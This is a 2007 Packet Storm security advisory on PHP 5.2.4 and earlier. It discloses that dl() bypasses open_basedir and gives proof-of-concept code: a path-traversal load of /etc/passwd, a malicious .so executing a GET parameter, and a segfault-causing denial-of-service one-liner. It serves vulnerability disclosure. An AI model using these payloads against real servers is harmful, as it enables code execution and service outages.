php524-basedir.txt

2007-09-10T00:00:00
ID PACKETSTORM:59199
Type packetstorm
Reporter laurent gaffie
Modified 2007-09-10T00:00:00

Description

                                        
                                            `Application: PHP <=5.2.4  
Web Site: http://php.net  
Platform: unix & windows /* replace .so --> dll . */  
Bug: open_basedir bypass & code exec & denial of service/*some people call this as a buffer overflow , but it's a denial of service.*/  
special condition: default php-memory-limit  
-------------------------------------------------------  
  
1) Introduction  
2) Bug  
3) Proof of concept  
4) Greets  
5) Credits  
===========  
1) Introduction  
===========  
  
"PHP is a widely-used general-purpose scripting language that  
is especially suited for Web development and can be embedded into HTML."  
  
======  
2) Bug  
======  
  
open_basedir bypass & code exec & denial of service  
http://ca.php.net/manual/fr/function.dl.php  
=====  
3)Proof of concept  
=====  
/*  
debian:~# php -v  
PHP 5.2.4 (cli) (built: Aug 31 2007 16:39:15)  
Copyright (c) 1997-2007 The PHP Group  
Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies  
*/  
  
  
Proof of concept example :  
/*enable by default in php.ini for php 5.2.x */  
  
<?php  
dl("../../../../../../../../../../../../../../etc/passwd")  
output --->  
Warning: dl() [function.dl]: Unable to load dynamic library './../../../../../../../../../etc/passwd' - ./../../../../../../../../../etc/passwd: invalid ELF header in /usr/local/apache2/htdocs/3.php on line 2  
  
ya right ... /etc/passwd dont have any ELF header .  
but we agree that it's not checked in anyway by open_basedir.  
fine then bypassed .  
then :  
<?php  
dl("./../../../../../../../../../../../home/myuser/www//my_powning_lib/pwned.so");  
$a = powningfunction($_GET['lets_exec_for_fun']);  
print_r($a);  
?>  
  
denial of service :  
debian:/home/mwoa# php -r'dl(str_repeat("0",27999991));'  
Erreur de segmentation  
debian:/home/lorenzo#  
  
========  
4)Greets  
========  
Ivanlef0u,Deimos,Benji,Berga,Soh,and everyones from worldnet: #futurezone & #nibbles  
  
=====  
5)Credits  
=====  
  
laurent gaffié  
laurent.gaffié@gmail.com  
secorizon coming soon !  
`